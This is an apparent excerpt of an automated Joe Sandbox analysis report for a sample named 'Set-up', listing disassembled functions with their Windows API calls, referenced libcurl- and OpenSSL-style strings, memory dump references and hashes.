_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,005FBED4), ref: 001A4855
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,005FBED4), ref: 001A4860
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,005FBED4), ref: 001A488E

Strings

crypto/bio/bss_file.c, xrefs: 001A4830, 001A4877, 001A48A4
BIO_new_file, xrefs: 001A4829, 001A4870, 001A489D
calling fopen(%s, %s), xrefs: 001A4845

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
API String ID: 3063597995-203430365
Opcode ID: 9bfdce90e5864355648431ae623b93e7395d5e3e6a3f236adfeef545770fec86
Instruction ID: 03beab9829b67c9837f333c1cfe6f013b36273e6047345823dd70c0ddf5ffdf8
Opcode Fuzzy Hash: 9bfdce90e5864355648431ae623b93e7395d5e3e6a3f236adfeef545770fec86
Instruction Fuzzy Hash: 7621C8A5F443447BE12032E03C47F3F3959DBA2B55F450025FA09A52D3FB9999154173

Function 000231D7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 000231EF
Process32First.KERNEL32 ref: 00023245
Process32Next.KERNEL32 ref: 000232CC
CloseHandle.KERNELBASE ref: 000232E7

Strings

processes, xrefs: 000232F3
pid, xrefs: 00023297
CreateToolhelp32Snapshot failed., xrefs: 0002320E
name, xrefs: 00023272

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: CreateToolhelp32Snapshot failed.$name$pid$processes
API String ID: 420147892-2059488242
Opcode ID: 80cc6914e0fcca5fdd1934a553f4b4b3c90b518862eda58dafdddc171350d6d4
Instruction ID: 13b5a6ae46e3f548dd42bbfa973e226060c3311af4db0d79fa19ea6e6ba7c8c5
Opcode Fuzzy Hash: 80cc6914e0fcca5fdd1934a553f4b4b3c90b518862eda58dafdddc171350d6d4
Instruction Fuzzy Hash: 4031B6B09057199BCB40EFB8D5456AEBBF4BF44304F40886DE994A7341EB789A44CF92

Function 00027770 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,000594BF,?), ref: 000277AE
recv.WS2_32(?,?,000594BF,?), ref: 000277BA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 000277F1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00027815
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002781D

Strings

recv, xrefs: 000277DB, 000277FA
LIMIT %s:%d %s reached memlimit, xrefs: 000277E2, 00027801
RECV %s:%d recv(%lu) = %ld, xrefs: 000277C8

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: recv$__acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
API String ID: 2542159810-640788491
Opcode ID: 113fc4905da007ec68f38ecfe998e600258d2072cd8ed2014cdc4c29d77e07cb
Instruction ID: 1d28f527f3929ff61edbd93ece8300f32008b6fa3c8fdebd34286d538c850dbb
Opcode Fuzzy Hash: 113fc4905da007ec68f38ecfe998e600258d2072cd8ed2014cdc4c29d77e07cb
Instruction Fuzzy Hash: 7211C8B9908364BBE7205B54FC4AE377FADEB85B68F040518F80953252DA619C00C6B1

Function 000275E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,?,?), ref: 00027618
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00027659
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 0002767D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00027685

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 0002764A, 00027669
FD %s:%d socket() = %d, xrefs: 0002762E
socket, xrefs: 00027643, 00027662

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflushsocket
String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
API String ID: 166263346-842387772
Opcode ID: ced7590ddeb5372f026b0d0f35f429ecb8b2a03edf3c7a4f76db665f53b033c3
Instruction ID: 361f121aeafeb005f59ece3ffb752842014522cb820e6554d00aadae99b2fe58
Opcode Fuzzy Hash: ced7590ddeb5372f026b0d0f35f429ecb8b2a03edf3c7a4f76db665f53b033c3
Instruction Fuzzy Hash: 6911EC76A052216BDB115B6DBC0AFAB3FA9EF81735F040514F804962E3DA61C854D7E1

Function 003AD1D0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003AD1E8

Strings

NaN, xrefs: 003ADBAB
Inf, xrefs: 003ADCA5, 003ADCBD
@, xrefs: 003AD4B7

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 86356d3f490351f4aaf8bc97fde9f094cfea3597e691f0dfbe3d62f665e51721
Instruction ID: dc1ece7fda203a6414ee5d7e1a45daf3d10aabbb59be27270135b3fc8dd33db5
Opcode Fuzzy Hash: 86356d3f490351f4aaf8bc97fde9f094cfea3597e691f0dfbe3d62f665e51721
Instruction Fuzzy Hash: 3DF1B17560C3818BD7229F24C0407ABBBE5FB86314F158A1DE9DE8B791D735D905CB82

Function 0005F6C3 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 359networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(?), ref: 0005F75B

Strings

Connected to %s (%s) port %u, xrefs: 00060026
%s connect timeout after %lldms, move on!, xrefs: 0005FA33
%s connect -> %d, connected=%d, xrefs: 0005F720
%s done, xrefs: 0005F9CD, 0005FD27, 0005FF03
%s trying next, xrefs: 0005F8FE

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: ErrorLast
String ID: %s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s trying next$Connected to %s (%s) port %u
API String ID: 1452528299-2219341415
Opcode ID: b3de3fe739fc5d490f66613a4e19aba982034354403846b1c467322088160b67
Instruction ID: 65e07e37c407bfe71f2609da703231c262bfcebf2a54f1fffb1c129b327be34d
Opcode Fuzzy Hash: b3de3fe739fc5d490f66613a4e19aba982034354403846b1c467322088160b67
Instruction Fuzzy Hash: B4E19F306047469FD724CF28C584B7BBBE1BF84305F14856CEC998B292D775E989CB91

Function 00059290 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 143networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000276A0: send.WS2_32( Y,?,?,?), ref: 000276DE

WSAGetLastError.WS2_32 ref: 000593C3

Part of subcall function 0003D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,000301B1), ref: 0003D8E2

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0005935C
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00059388

Strings

cf-socket.c, xrefs: 000592CF
Send failure: %s, xrefs: 000593FB
send(len=%zu) -> %d, err=%d, xrefs: 00059447

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1798382672-2691795271
Opcode ID: 7b70c78bd36403263936e03e681676741c20876a92d5b07b57a9becefd84bd5a
Instruction ID: 084738a7a6080c39a56e20121d51e5991ae27c8082df14908e6e27e975149d00
Opcode Fuzzy Hash: 7b70c78bd36403263936e03e681676741c20876a92d5b07b57a9becefd84bd5a
Instruction Fuzzy Hash: 7351BE70600305EBE711DF24C881FABB7A6FF88314F148529FD489B292E770E995CB91

Function 000E77B0 Relevance: 10.6, APIs: 7, Instructions: 84fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,005C5FED,00000000,00000000,?,?,?,000E9882,?,00000000), ref: 000E77DD
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 000E77F0
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 000E7802
GetLastError.KERNEL32(?,00000000), ref: 000E780E
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 000E7830
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 000E7843
fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E786B

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: fseek$ErrorLastfclosefopenfreadftell
String ID:
API String ID: 1915723720-0
Opcode ID: 35ea52a1a1630f78084e03ade060ee71f87412b52f74c3e432575c0d0e44dd53
Instruction ID: 736cfe0743ab36804cf4d53e3d348d49985306a958961ec5673edc0101087662
Opcode Fuzzy Hash: 35ea52a1a1630f78084e03ade060ee71f87412b52f74c3e432575c0d0e44dd53
Instruction Fuzzy Hash: AF11BCF1E453402FFB2126225D4AB7B7588DB61374F140438FD49EA282FD66D914C5B2

Function 0005A150 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,00000080), ref: 0005A1C6
WSAGetLastError.WS2_32 ref: 0005A1D0

Part of subcall function 0003D090: GetLastError.KERNEL32 ref: 0003D0A1
Part of subcall function 0003D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D0A9
Part of subcall function 0003D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D0CD
Part of subcall function 0003D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D0D7
Part of subcall function 0003D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0003D381
Part of subcall function 0003D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0003D3A2
Part of subcall function 0003D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D3BF
Part of subcall function 0003D090: GetLastError.KERNEL32 ref: 0003D3C9
Part of subcall function 0003D090: SetLastError.KERNEL32(00000000), ref: 0003D3D4

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A21C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A220

Strings

ssloc inet_ntop() failed with errno %d: %s, xrefs: 0005A23B
getsockname() failed with errno %d: %s, xrefs: 0005A1F0

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 2076026050-2605427207
Opcode ID: f7189010a79da1269c78cacb45beb79bf068f19df10ab789bbd11e2458cf65db
Instruction ID: 277f9982a4b995981f69c6898d6a76909f5272a77170af29448ad57e5e6b4a46
Opcode Fuzzy Hash: f7189010a79da1269c78cacb45beb79bf068f19df10ab789bbd11e2458cf65db
Instruction Fuzzy Hash: 9721E671908680AAE7269B18EC46FE777BCEF95324F040215FD9853152FB32598987A2

Function 00027310 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00023BA6,?,006F0044,00021BD2), ref: 000273A6
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00023BA6,?,006F0044,00021BD2), ref: 000273CA
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00023BA6,?,006F0044,00021BD2), ref: 000273D2

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 00027397, 000273B6
MEM %s:%d calloc(%zu,%zu) = %p, xrefs: 00027376
calloc, xrefs: 00027390, 000273AF

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
API String ID: 4185500129-1340350808
Opcode ID: bf768c405c4136044da834b11c3d3717df47abe4814f10a2d506be220b53a822
Instruction ID: 5d220c19276929dc6c73ee8f1de6e4d672556ee89c5db9be1e792057cc5d63bc
Opcode Fuzzy Hash: bf768c405c4136044da834b11c3d3717df47abe4814f10a2d506be220b53a822
Instruction Fuzzy Hash: 1421F075A04321ABE7209F15EC46F6BBBE9EB89B54F040428FC0C92252E661D900D7F2

Function 0003D5E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42networklibraryloaderCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 0003D65A

Part of subcall function 0003D690: GetModuleHandleA.KERNEL32(kernel32,00000000,?,?,?,0003D5FA,iphlpapi.dll), ref: 0003D699
Part of subcall function 0003D690: GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 0003D6B5
Part of subcall function 0003D690: strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,005A1BD4,?,?,0003D5FA,iphlpapi.dll), ref: 0003D6C3

GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 0003D60C
QueryPerformanceFrequency.KERNEL32(006F0070), ref: 0003D643
WSACleanup.WS2_32 ref: 0003D67C

Strings

iphlpapi.dll, xrefs: 0003D5F0
if_nametoindex, xrefs: 0003D606

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartupstrpbrk
String ID: if_nametoindex$iphlpapi.dll
API String ID: 3452087986-3097795196
Opcode ID: faf95a99a113b547ce4f7ae26fe395832a1a99719ba92e6ad711559d9c3e4239
